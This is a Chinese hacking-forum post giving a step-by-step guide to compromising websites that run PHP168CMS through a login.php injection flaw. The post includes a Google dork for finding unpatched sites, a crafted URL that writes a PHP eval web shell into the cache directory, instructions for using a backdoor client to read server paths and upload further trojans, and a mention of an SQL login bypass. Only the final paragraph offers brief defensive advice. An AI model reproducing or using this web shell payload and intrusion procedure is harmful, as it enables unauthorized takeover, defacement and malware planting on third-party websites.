黑帽联盟

 找回密码
 会员注册
查看: 1439|回复: 0
打印 上一主题 下一主题

[系统安全] 通过登陆文件注入漏洞给网页挂马

[复制链接]
yun 黑帽联盟官方人员 

920

主题

37

听众

1364

积分

超级版主

Rank: 8Rank: 8

  • TA的每日心情
    奋斗
    2019-10-18 11:20
  • 签到天数: 678 天

    [LV.9]以坛为家II

    不少网站在后台登陆框输入‘or’'='代码就可以直接登陆网站后台,这种方式曾经是最流行入侵方式,而今天讲的是如何利用login后台登陆文件漏洞注入代码。


    login.php(.asp/.aspx)文件一般都是作为CMS系统的管理员后台登陆文件,这里以PHP168CMS系统为例,login.php漏洞实际上的一个注入漏洞,是利用文件代码设计不良直接讲恶意代码直接上传到网站目录中。利用此漏洞可以进入网站,实行内容篡、网页挂马等手段。


    第一步,寻找使用PHP168CMS的网站
    在google中输入“powered by php168”,然后随意找到一个网站作为测试,主要是寻找没有打补丁的网站。然后在域名后面输入,例:http://xxx.com/login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>如果出现了登陆界面就表明漏洞被成功利用。(文中的入侵域名请换成搜索的网站域名)


    第二步,读取网站目录,获取网站绝对路径
    如果代码成功执行,木马就会保存在cache\shell.php文件中,然后下载一个“lanker微型PHP后门客户端”,在木马地址栏输入http://xxx.com/cache/shell.php,然后选择读取目录,如果连接成功就能显示出网站所在服务器中的绝对路径。


    第三步,开始上传PHP网页木马
    在lanker微型PHP后门的基本功能列表中选择上传网页木马,上传的文件会保存在cache目录中。在域名的后面输入“cache/网站木马文件名”就可以运行木马了,至此已经对使用PHP168CMS系统的网站获得了控制权,可以任意的修改和删除。


    其实存在login注入漏洞的不止PHP168一家,还有很多不知名的PHP网站源码都有这个漏洞,如果你使用的是PHP系统,请赶快检测你的程序是否有这个问题吧。对于PHP语言不了解的站长可以利用PHP注入漏洞扫描工具对你的网站进行扫描,例如:CASI、PHP-Mysql注入分析器、ZBSI等工具。更详细方法可以google一下:“如何预防和检测网页挂马”。或者查看我写过的关于网站挂马文章。

    本文转载自网络
    帖子永久地址: 

    黑帽联盟 - 论坛版权1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关
    2、本站所有主题由该帖子作者发表,该帖子作者与黑帽联盟享有帖子相关版权
    3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和黑帽联盟的同意
    4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
    5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
    6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
    7、黑帽联盟管理员和版主有权不事先通知发贴者而删除本文

    您需要登录后才可以回帖 登录 | 会员注册

    发布主题 !fastreply! 收藏帖子 返回列表 搜索
    回顶部